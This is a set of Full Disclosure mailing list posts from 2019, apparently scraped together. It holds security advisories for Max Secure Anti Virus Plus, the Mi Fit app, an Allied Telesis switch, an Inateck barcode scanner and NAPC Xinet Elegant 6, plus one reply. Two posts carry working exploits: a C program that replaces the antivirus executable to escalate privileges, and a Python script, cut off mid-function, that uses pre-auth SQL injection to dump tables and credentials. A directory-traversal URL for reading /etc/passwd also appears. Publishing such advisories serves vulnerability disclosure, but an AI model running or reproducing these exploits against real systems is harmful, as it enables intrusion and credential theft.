[FD] Max Secure Anti Virus Plus - 19.0.4.020 / CVE-2019-19382 Insecure Permissions

[hyp3rlinx]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec


[Vendor]www.maxpcsecure.com


[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
CVE-2019-19382


[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the
installation directory.
Local attackers or malware running at low integrity can replace a .exe
or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT
AUTHORITY\Authenticated Users:(ID)F
   BUILTIN\Users:(ID)F
   NT AUTHORITY\SYSTEM:(ID)F
   BUILTIN\Administrators:(ID)F


[Affected Component]
Permissions on installation directory


[Exploit/POC]
#include 
#include 
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib &
FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){

  if(!FileExists(DISABLED_TARGET)){
CopyFile(TARGET, TMP, FALSE);
Sleep(1000);
CopyFile(TMP, DISABLED_TARGET, FALSE);
printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
Sleep(1000);
printf("[+] Disabled MaxSDUI.exe ...\n");
Sleep(300);
   }else{
 PWNED=TRUE;
   }

if(!PWNED){
char fname[MAX_PATH];
char newLoc[]=TARGET;
DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
   if (size){
 printf("[+] Copying exploit to vuln dir...\n");
 Sleep(1000);
 CopyFile(fname, TARGET, FALSE);
 printf("[+] Replaced legit Max Secure EXE...\n");
 Sleep(2000);
 printf("[+] Done!\n");
 MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus
Plus\\MaxPwn.lnk");
 Sleep(1000);
 exit(0);
}
}else{
if(FileExists(TMP)){
 remove(TMP);
}
printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
printf("[+] hyp3rlinx\n");
system("pause");
 }
}


[POC Video URL]https://www.youtube.com/watch?v=DXSV5geXkTw


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check

[Tim]

What's the issue here exactly? An attacker can just prevent an the in app
update check from realizing it needs to nag the user?

The actual update logic and update-ability is controlled through the Play
Store, no?

-Tim Strazzere


On Tue, Nov 26, 2019 at 10:27 AM David Coomber <
davidcoomber.info...@gmail.com> wrote:

> Anhui Huami Mi Fit Android Application - Unencrypted Update Check
> --
> https://www.info-sec.ca/advisories/Huami-Mi-Fit.html
>
> Overview
>
> "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts."
>
> (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health)
>
> Issue
>
> The Anhui Huami Mi Fit Android application (version 4.0.10 and below),
> does not encrypt the connection when it checks for an update.
>
> Impact
>
> An attacker who can monitor network traffic may be able to tamper with
> the application's update function.
>
> Timeline
>
> October 21, 2019 - Attempted to obtain a security contact via an email
> to supp...@amazfit.com
> October 22, 2019 - Provided the details to CERT/CC
> October 23, 2019 - CERT/CC opened a case for tracking
> November 4, 2019 - Attempted to obtain a security contact via an email
> to secur...@xiaomi.com
>
> Solution
>
> Upgrade to version 4.0.11 or later
>
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2019-18922; Directory Traversal; Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047]

[Sprenger, Nicolas Hendrik]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

=
CVEID: CVE-2019-18922
NAME OF AFFECTED PRODUCT: Allied Telesis AT-GS950/8 until Firmware AT-S107 
V.1.1.3 [1.00.047]
PROBLEM TYPE: Directory Traversal
DESCRIPTION: A Directory Traversal in the Web interface of the Allied Telesis 
AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047] allows unauthenticated 
attackers to read arbitrary system files via a GET request. 
NOTE: This is an End-of-Life product.

=

I. VULNERABILITY
- -
The Allied Telesis AT-GS950/8 Network Switch with Firmware until AT-S107 
V.1.1.3 [1.00.047]
is confirmed to have an Directory Traversal Vulnerability.

II. BACKGROUND
- -
The AT-S107 Firmware is used for Configuration through an Web-Interface.

III. DESCRIPTION
- -
A GET-Request with the Path http://[IP]/../../../../../../etc/passwd shows the 
File-Content.

V. BUSINESS IMPACT
- -
A Attacker can read arbitrary System-Files.


VI. SYSTEMS AFFECTED
- -
Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 [1.00.047].

VII. CREDITS
- -
The Vulnerability has been discovered by the Security-Team at the University 
Bayreuth. [N. H. Sprenger, Dr. H. Benda].

VIII. LEGAL NOTICES
- -
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.

=
-BEGIN PGP SIGNATURE-

iQEzBAEBCAAdFiEEJliv/QRedf6UzVmWtNym7A91fYQFAl3ftoYACgkQtNym7A91
fYQvcwgAqSC6BU4EFbZvSX/mFecjeEIwphIgEp3n1QPb2gwwJHA3DGYdWNzp05YD
ZytxPofVoH+bWxZWun7vMi0c4HhZHPM3CJaJmcMoahSI2FEFfytQYbhcN/oWLCl+
ahc1J062wj2lnwh7gmLrdUX0RD2oM0VVnaU4gNAYMykVGTuQVVjTi2YwHFysaz1T
zEJQXOHxrdUC4BPgaYdimpmJts4M6IxCghYRWsMOTObKFlmfMVMQpsc+OgKF34U2
aWRJQq05AE4FYYYHg81pFVcjVWRQ8ZOObEl4OgwTCY+vWwMS0BK4MZXMQkvB0y8t
b6hbNAeasEaQ4g3SrzTe5273F7HF9g==
=ZqDR
-END PGP SIGNATURE-

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [SYSS-2019-027]: Inateck BCST-60 Barcode Scanner - Keystroke Injection Vulnerability (CVE-2019-12503)

[Matthias Deeg]

Advisory ID: SYSS-2019-027
Product: BCST-60 Barcode Scanner
Manufacturer: Inateck
Affected Version(s): BCST-60
Tested Version(s): BCST-60
Vulnerability Type: Cryptographic Issues (CWE-310)
Keystroke Injection Vulnerability
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: -
Public Disclosure: 2019-11-28
CVE Reference: CVE-2019-12503
Author of Advisory: Matthias Deeg (SySS GmbH)



Overview:

Inateck BCST-60 is a barcode scanner that can be either used wirelessly
using 2.4 GHz radio communication or wired via USB.

The manufacturer describes the product as follows [1]:

"With a 2.4G wireless connection, avoid the troubles of Bluetooth
pairing. Inateck BCST-60 is a leading product among scanners in the
field of large transmission ranges and battery endurance. What's more,
it can read barcodes at extreme angles. Whether you need barcode
scanning at your retail POS, at a hospital patient's bedside, on the
manufacturing production line or your warehouse, the Inateck BCST-60
will be a great fit for your specific needs."

Due to an insecure implementation of the data communication, the
wireless barcode scanner Inateck BCST-60 is vulnerable to keystroke
injection attacks.



Vulnerability Details:

SySS GmbH found out that the wireless barcode scanner Inateck BCST-60 is
vulnerable to keystroke injection attacks.

An attacker can analyze the unencrypted and unauthenticated data packets
of the 2.4 GHz radio communication sent by the wireless barcode scanner
to the receiver (USB dongle) in order to learn the used protocol. By
knowing the used data protocol, it is possible to send packets to the
USB dongle (receiver) of a target system, containing attacker-controlled
keystrokes or keystroke sequences.



Proof of Concept (PoC):

SySS GmbH could successfully perform keystroke injection attacks against
the wireless barcode scanner Inateck BCST-60 using a developed
proof-of-concept software tool in combination with the USB radio dongle
Crazyradio PA and the nrf-research-firmware by Marc Newlin [2, 3].



Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.



Disclosure Timeline:

2019-05-22: Vulnerability reported to manufacturer
2019-11-28: Public release of security advisory



References:

[1] Product website for Inateck BCST-60 barcode scanner

https://www.inateck.com/bcst-60-2-4ghz-wireless-barcode-scanner-with-35m-range.html
[2] Product website for Crazyradio PA
https://www.bitcraze.io/crazyradio-pa/
[3] nRF24 research firmware and tools by Marc Newlin
https://github.com/marcnewlin/presentation-clickers
[4] SySS Security Advisory SYSS-2019-027

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-027.txt
[5] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy/



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en




signature.asc
Description: OpenPGP digital signature

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] NAPC Xinet Elegant 6 Asset Library Web Interface v6.1.655 / Pre-Auth SQL Injection 0Day

[hyp3rlinx]

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NAPC-XINET-ELEGANT-6-ASSET-LIBRARY-WEB-INTERFACE-PRE-AUTH-SQL-INJECTION.txt
[+] ISR: ApparitionSec


[Vendor]
www.napc.com


[Product]
Xinet Elegant 6 Asset Library Web Interface v6.1.655

Web based interface for xinet asset management solution.


[Vulnerability Type]
Pre-Auth SQL Injection


[CVE Reference]
CVE-2019-19245


[Security Issue]
NAPC Xinet (interface) Elegant 6 Asset Library v6.1.655 allows
Pre-Authentication Error based SQL Injection via the /elegant6/login
LoginForm[username] field when
double quotes are used. The vulnerable version seems to be old, but it may
still be possible to still find it deployed as I have.

Vulnerable Parameter: LoginForm[username] (POST) Method.


[Exploit/POC]
import requests,time,re,sys,argparse

#NAPC Xinet Elegant 6 Asset Library v6.1.655
#Pre-Auth SQL Injection 0day Exploit
#By hyp3rlinx
#ApparitionSec
#==
#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS:
LoginForm[password]=[rememberMe]=0[username]=SQL
#SQL INJECTION VULN PARAM --> LoginForm[username]
#

IP=""
PORT="80"
URL=""
NUM_INJECTS=20
k=1
j=0
TABLES=False
CREDS=False
SHOW_SQL_ERROR=False


def vuln_ver_chk():
global IP, PORT
TARGET = "http://"+IP+":"+PORT+"/elegant6/login;
response = requests.get(TARGET)
if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content):
print "[+] Found vulnerable NAPC Elegant 6 Asset Library version
6.1.655."
return True
print "[!] Version not vulnerable :("
return False


def sql_inject_request(SQL):

global IP, PORT
URL = "http://"+IP+":"+PORT+"/elegant6/login;

tmp=""
headers = {'User-Agent': 'Mozilla/5.0'}
payload =
{'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
session = requests.Session()

res = session.post(URL,headers=headers,data=payload)
idx = res.content.find('CDbCommand')  # Start of SQL Injection Error in
response
idx2 = res.content.find('key 1')  # End of SQL Injection Error in
response

return res.content[idx : idx2+3]



#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
def inc():
global k,j
while j < NUM_INJECTS:
j+=1
if k !=1:
k+=1
return str(j)+','+str(k)


def tidy_up(results):
global CREDS
idx = results.find("'")
if idx != -1:
idx2 = results.rfind("'")
if not CREDS:
return results[idx + 1: idx2 -2]
else:
return results[idx + 2: idx2]



def breach(i):
global k,j,NUM_INJECTS,SHOW_SQL_ERROR
result=""

#Dump Usernames & Passwords
if CREDS:
if i % 2 == 0:
target='username'
else:
target='password'

SQL=('"and (select 1 from(select count(*),concat((select(select
concat(0x2b,'+target+'))'
'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user
group by x)a)-- -')

if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL)+"\n"
print "[+] Dumping "+target+": "+result

#Dump Tables
if TABLES:
while j < NUM_INJECTS:
nums = inc()
SQL=('"and (select 1 from (Select count(*),Concat((select
table_name from information_schema.tables where table_schema=database()'
'limit '+nums+'),0x3a,floor(rand(0)*2))y from
information_schema.tables group by y) x)-- -')

if not SHOW_SQL_ERROR:
result = tidy_up(sql_inject_request(SQL))
else:
result = sql_inject_request(SQL) + "\n"

print "[+] Dumping Table... " +result
time.sleep(0.3)



def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--ip_address", help=".")
parser.add_argument("-p", "--port", help="Port, Default is 80")
parser.add_argument("-t", "--get_tables", nargs="?", const="1",
help="Dump Database Tables.")
parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump
Database Credentials.")
parser.add_argument("-m", "--max_injects", nargs="?", const="1",
help="Max SQL Injection Attempts, Default is 20.")
parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1",
help="Display SQL Errors, Default is Clean Dumps.")
parser.add_argument("-e", "--examples", nargs="?", const="1",
help="Show script usage.")
return parser.parse_args()



def usage():
print "Dump first ten rows of usernames and passwords"
print "NAPC-Elegant-6-SQL-Exploit.py -i  -c -m 10\n"
print "\nDump first five rows of database tables and show SQL errors"
print "NAPC-Elegant-6-SQL-Exploit.py -i  -t -m 5 -s\n"
exit(0)


def main(args):

global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR

if args.ip_address: